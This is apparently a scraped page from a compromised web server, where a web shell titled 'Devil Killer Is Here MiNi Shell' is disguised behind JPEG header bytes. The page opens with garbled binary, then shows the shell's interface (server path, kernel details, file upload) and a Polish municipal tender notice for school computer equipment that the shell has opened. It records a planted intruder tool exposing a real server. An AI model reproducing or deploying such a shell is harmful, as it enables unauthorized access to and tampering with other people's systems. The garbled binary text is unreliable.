JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220304/0007637601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa doposażenia pracowni przedmiotowych w zakresie sprzętu komputerowego i wyposażenia dydaktycznego w ramach projektu „ENIGMA –wsparcie nauczania matematyki i informatyki w szkołach podst(...) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Szamotuły</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258230</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szamotuły</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48612927586</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48612920072</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">umig@szamotuly.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/szamotuly</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa doposażenia pracowni przedmiotowych w zakresie sprzętu komputerowego i wyposażenia dydaktycznego w ramach projektu „ENIGMA –wsparcie nauczania matematyki i informatyki w szkołach podst(...) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6c1a0acf-9bb3-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00076376</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00040440/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa doposażenia pracowni przedmiotowych w zakresie sprzętu komputerowego i wyposażenia dydaktycznego w ramach projektu „ENIGMA –wsparcie nauczania matematyki i informatyki w szkołach podst.(...)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie dofinansowane ze środków Europejskiego Funduszu Społecznego w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2014-2020 pn. „ENIGMA – Wsparcie nauczania matematyki i informatyki w szkołach ponadpodstawowych metropolii Poznań” nr RPWP.08.01.04-30-0005/19. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szamotuly <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/szamotuly</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i wycofania oferty znajduje się na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje1.<br/>Wykonawca może złożyć tylko jedną ofertę. Wykonawca składa ofertę w postaci elektronicznej za pośrednictwem Platformy.2. Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym<br/>podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis<br/>zaufany lub podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu.3.Oferta powinna być:1. sporządzona na podstawie załączników niniejszej SWZ w języku polskim,2. złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platforma zakupowa.pl,3. podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione4. Podpisy kwalifikowane<br/>wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014- od 1 lipca 2016 roku”.5. W przypadku wykorzystania formatu podpisu XAdES<br/>zewnętrzny.Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.Szczegółowy opis określa SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">INFORMACJA DOTYCZĄCA<br/>PRZETWARZANIADANYCH OSOBOWYCHZgodnie z treścią rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L 119 z<br/>04.05.2016), zwanego dalej „RODO”, Miasto i Gmina Szamotuły informuje że: I. ADMINISTRATOR<br/>DANYCH OSOBOWYCH Administratorem Pani/Pana danych osobowych jest Miasto i Gmina<br/>Szamotuły, adres siedziby: ul. Dworcowa 24, 64-500 Szamotuły, tel. (61) 29-27-576, 568, fax 61 29 20<br/>072, NIP 787-207-44-67, REGON 631258230, zwany dalej Miasto i Gmina Szamotuły.Inspektor<br/>ochrony danych w Mieście i Gminie Szamotuły jest Pani Pani Aleksandra Cnota-Mikołajec, kontakt:<br/>iod@eduodo.pl. II.RODZAJ DANYCH OSOBOWYCH PRZETWARZANYCH PRZEZ<br/>ADMINISTRATORA - Opis w SWZIII. ŹRÓDŁO POZYSKIWANIA DANYCH OSOBOWYCH - Opis w<br/>SWZ IV. CEL I PODSTAWA PRAWNA PRZETWARZANIA DANYCH OSOBOWYCH-Opis w SWZ V.<br/>ODBIORCY DANYCH OSOBOWYCH-Opis w SWZ VI. PRAWA OSOBY, KTÓREJ DANE DOTYCZĄ<br/>Opis w SWZ VII. CZAS PRZETWARZANIA DANYCH OSOBOWYCH-Opis w SWZ VIII. WYTYCZNE<br/>DLA WYKONAWCY1. Wykonawca ubiegając się o udzielenie zamówienia publicznego jest<br/>zobowiązany do wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem w<br/>postępowaniu. Do obowiązków tych należą m.in. obowiązki wynikające z RODO, w szczególności<br/>własny obowiązek informacyjny Wykonawcy, przewidziany w art. 13 RODO, względem osób<br/>fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał.<br/>Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w<br/>zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (vide: art. 13<br/>ust. 4). 2. Ponadto Wykonawca wypełnia własny obowiązek informacyjny Wykonawcy, wynikający z<br/>art. 14 RODO względem osób fizycznych, których dane przekazuje Zamawiającemu i których dane<br/>pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art.<br/>14 ust. 5 RODO. 3. Mając na uwadze powyższe, w celu ochrony prawnie uzasadnionych interesów<br/>osoby trzeciej, której dane zostały przekazane Zamawiającemu przez Wykonawcę oraz celem<br/>zapewnienia, że Wykonawca wypełnił wyżej wymienione własne obowiązki informacyjne, a osoby<br/>których dane dotyczą posiadają wiedzę, że ich dane zostały ujawnione Zamawiającemu, Wykonawca<br/>składa wobec Zamawiającego oświadczenie stanowiące Załącznik nr 8 do SWZ, w którego treści<br/>Wykonawca potwierdzi wypełnienie rzez Wykonawcę jego obowiązków informacyjnych przewidzianych<br/>w art. 13 lub art. 14 RODO oraz potwierdzi przekazanie osobom których dane dotyczą, treści klauzuli<br/>informacyjnej Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WI.271.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 182210,19 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I: <br/>Szkoła Podstawowa nr 1 w Szamotułach, ul. Stanisława Staszica 1, 64-500 Szamotuły<br/>1.Zestaw urządzeń do nauki programowania w języku Python typu EV3 lub równoważny<br/>2.Zestaw urządzeń do nauki programowania w języku C/C++ <br/>lub równoważny;<br/>3. Laptop z oprogramowaniem;<br/>4. Serwer z oprogramowaniem;<br/>5. Zestaw robotów programowalnych edukacyjnych 6w1.<br/><br/>a. Przedmiotem zamówienia jest dostawa, montaż, instalacja i konfiguracja doposażenia pracowni przedmiotowych w zakresie sprzętu komputerowego i wyposażenia dydaktycznego dla 2 szkół w ramach projektu „ENIGMA –wsparcie nauczania matematyki i informatyki w szkołach podstawowych i ponadgimnazjalnych Metropolii Poznań”.<br/>b. Sprzęt musi być fabrycznie nowy, z datą produkcji co najmniej z 2019 roku, nieużywany, nieuszkodzony, nieobciążony prawami osób trzecich, wysokiej jakości.<br/>c. Wymagane jest zapewnienie minimum 24 miesięcznego okresu gwarancji na wszystkie pomoce dydaktyczne, wymienione w przedmiocie zamówienia z opcją „door to door” (wszystkie koszty obsługi serwisowej pokryje Wykonawca), z czasem usunięcia usterki przez serwis określonym na maksymalnie 10 dni roboczych od momentu zgłoszenia usterki. <br/><br/>Równoważność:<br/>a. Zamawiający w załącznikach do SWZ, wskazał znaki towarowe dopuszczając jednocześnie rozwiązania równoważne. Kryteria stosowane w celu oceny równoważności zostały wskazane w załączniku nr 1 do umowy<br/>b. Jeżeli w dokumentach zamówienia wskazano odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych Zamawiający dopuszcza rozwiązania równoważne opisywanym,<br/>c. Wykazanie równoważności leży po stronie Wykonawcy i powinno zostać przez niego udokumentowane i złożone wraz z ofertą.<br/><br/>Szczegółowy opis przedmiotu zamówienia stanowi:<br/> - Formularz ofertowy - załącznik nr 1 do SWZ, <br/> - Formularz cenowy - załącznik nr 8 do SWZ, <br/>	- Projekt umowy - załącznik nr 7 do SWZ,<br/>	- Szczegółowy opis przedmiotu zamówienia - załącznik nr 5 do SWZ;	<br/><br/>Przedmiot zamówienia zostanie w 100% sfinansowane ze środków UE. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 91482,41 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">32322000-6 - Urządzenia multimedialne</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XII.	KRYTERIA OCENY OFERT, ICH ZNACZENIE ORAZ SPOSÓB OCENY OFERT <br/>1.	Kryteria oceny ofert i ich znaczenie: <br/><br/>KRYTERIUM	RANGA<br/>Cena (C)	60%<br/>Okres gwarancji (G)	30%<br/>Termin realizacji przedmiotu zamówienia (T)	10%<br/>RAZEM:	100%<br/><br/>2. Kryterium cena (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w ofercie.<br/>Zamawiający przyzna punkty na podstawie poniższego wzoru:<br/>C = Cmin / Co x 60 pkt.<br/>gdzie: Cmin – cena brutto oferty najtańszej<br/> Co – cena brutto oferty ocenianej<br/>3. Kryterium okres obowiązującej gwarancji (G) będzie rozpatrywane na podstawie okresu udzielonej gwarancji na wszystkie pomoce dydaktyczne, wymienione w przedmiocie zamówienia przez Wykonawcę w ofercie. <br/>Zamawiający wymaga podania okresu w pełnych miesiącach, przy czym okres ten nie może być krótszy niż 24 miesiące. Wskazanie okresu krótszego spowoduje odrzucenie oferty. Okres dłuższy niż 48 miesięcy dla potrzeb obliczenia punktacji będzie traktowany jako 48 miesięcy gwarancji. Niepodanie w ofercie okresu będzie traktowane jako zaoferowanie 24 miesięcy gwarancji.<br/>Zamawiający przyzna punkty na podstawie poniższego wzoru:<br/>G = Go / Gmax x 30 pkt.<br/>gdzie: Gmax – najdłuższy okres wśród badanych ofert<br/> Go – okres w ofercie ocenianej<br/><br/>4. Kryterium termin realizacji przedmiotu zamówienia (T): 10 pkt.<br/>Oferta może otrzymać maksymalnie 10 punktów jeżeli Wykonawca zaoferuje wykonanie zamówienia w terminie krótszym od wymaganych maksymalnie 45 dni kalendarzowych od dnia podpisania umowy, przyznawanych w następujący sposób:<br/>a) Wykonanie zamówienia w ciągu 45 dni - 0 pkt.<br/>b) Wykonanie zamówienia w ciągu 40dni – 5 pkt.<br/>c) Wykonanie zamówienia w ciągu 35dni, lub krótszym – 10 pkt.<br/>Zaoferowanie terminu dłuższego niż 45 dni spowoduje odrzucenie oferty.<br/><br/>Zamawiający dokona wyboru oferty tego z Wykonawców, która uzyska w wyniku oceny najwyższą liczbę punktów. Przyznanie punków poszczególnym ofertom odbędzie się w oparciu o następujący wzór:<br/>Ocena oferty = C+G+T<br/>Obliczenia będą dokonane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II: <br/>Szkoła Podstawowa nr 3 w Szamotułach, ul. Szczuczyńska 5, 64-500 Szamotuły. <br/>1. Zestaw urządzeń do nauki programowania w języku Python typu EV3 lub równoważny;<br/>2. Zestaw urządzeń do nauki programowania w języku C/C++ <br/>lub równoważny;<br/>3. Monitor interaktywny 75”;<br/>4. Laptop z oprogramowaniem;<br/>5. Kserokopiarka;<br/>6. Urządzenie wielofunkcyjne;<br/>7. Drukarka + skaner 3D.<br/><br/>a. Przedmiotem zamówienia jest dostawa, montaż, instalacja i konfiguracja doposażenia pracowni przedmiotowych w zakresie sprzętu komputerowego i wyposażenia dydaktycznego dla 2 szkół w ramach projektu „ENIGMA –wsparcie nauczania matematyki i informatyki w szkołach podstawowych i ponadgimnazjalnych Metropolii Poznań”.<br/>b. Sprzęt musi być fabrycznie nowy, z datą produkcji co najmniej z 2019 roku, nieużywany, nieuszkodzony, nieobciążony prawami osób trzecich, wysokiej jakości.<br/>c. Wymagane jest zapewnienie minimum 24 miesięcznego okresu gwarancji na wszystkie pomoce dydaktyczne, wymienione w przedmiocie zamówienia z opcją „door to door” (wszystkie koszty obsługi serwisowej pokryje Wykonawca), z czasem usunięcia usterki przez serwis określonym na maksymalnie 10 dni roboczych od momentu zgłoszenia usterki. <br/><br/>Równoważność:<br/>a. Zamawiający w załącznikach do SWZ, wskazał znaki towarowe dopuszczając jednocześnie rozwiązania równoważne. Kryteria stosowane w celu oceny równoważności zostały wskazane w załączniku nr 1 do umowy<br/>b. Jeżeli w dokumentach zamówienia wskazano odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych Zamawiający dopuszcza rozwiązania równoważne opisywanym,<br/>c. Wykazanie równoważności leży po stronie Wykonawcy i powinno zostać przez niego udokumentowane i złożone wraz z ofertą.<br/><br/>Szczegółowy opis przedmiotu zamówienia stanowi:<br/> - Formularz ofertowy - załącznik nr 1 do SWZ, <br/> - Formularz cenowy - załącznik nr 8 do SWZ, <br/>	- Projekt umowy - załącznik nr 7 do SWZ,<br/>	- Szczegółowy opis przedmiotu zamówienia - załącznik nr 5 do SWZ;	<br/><br/>Przedmiot zamówienia zostanie sfinansowane w 100% ze środków UE </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 90727,78 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">32322000-6 - Urządzenia multimedialne</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XII.	KRYTERIA OCENY OFERT, ICH ZNACZENIE ORAZ SPOSÓB OCENY OFERT <br/>1.	Kryteria oceny ofert i ich znaczenie: <br/><br/>KRYTERIUM	RANGA<br/>Cena (C)	60%<br/>Okres gwarancji (G)	30%<br/>Termin realizacji przedmiotu zamówienia (T)	10%<br/>RAZEM:	100%<br/><br/>2. Kryterium cena (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w ofercie.<br/>Zamawiający przyzna punkty na podstawie poniższego wzoru:<br/>C = Cmin / Co x 60 pkt.<br/>gdzie: Cmin – cena brutto oferty najtańszej<br/> Co – cena brutto oferty ocenianej<br/>3. Kryterium okres obowiązującej gwarancji 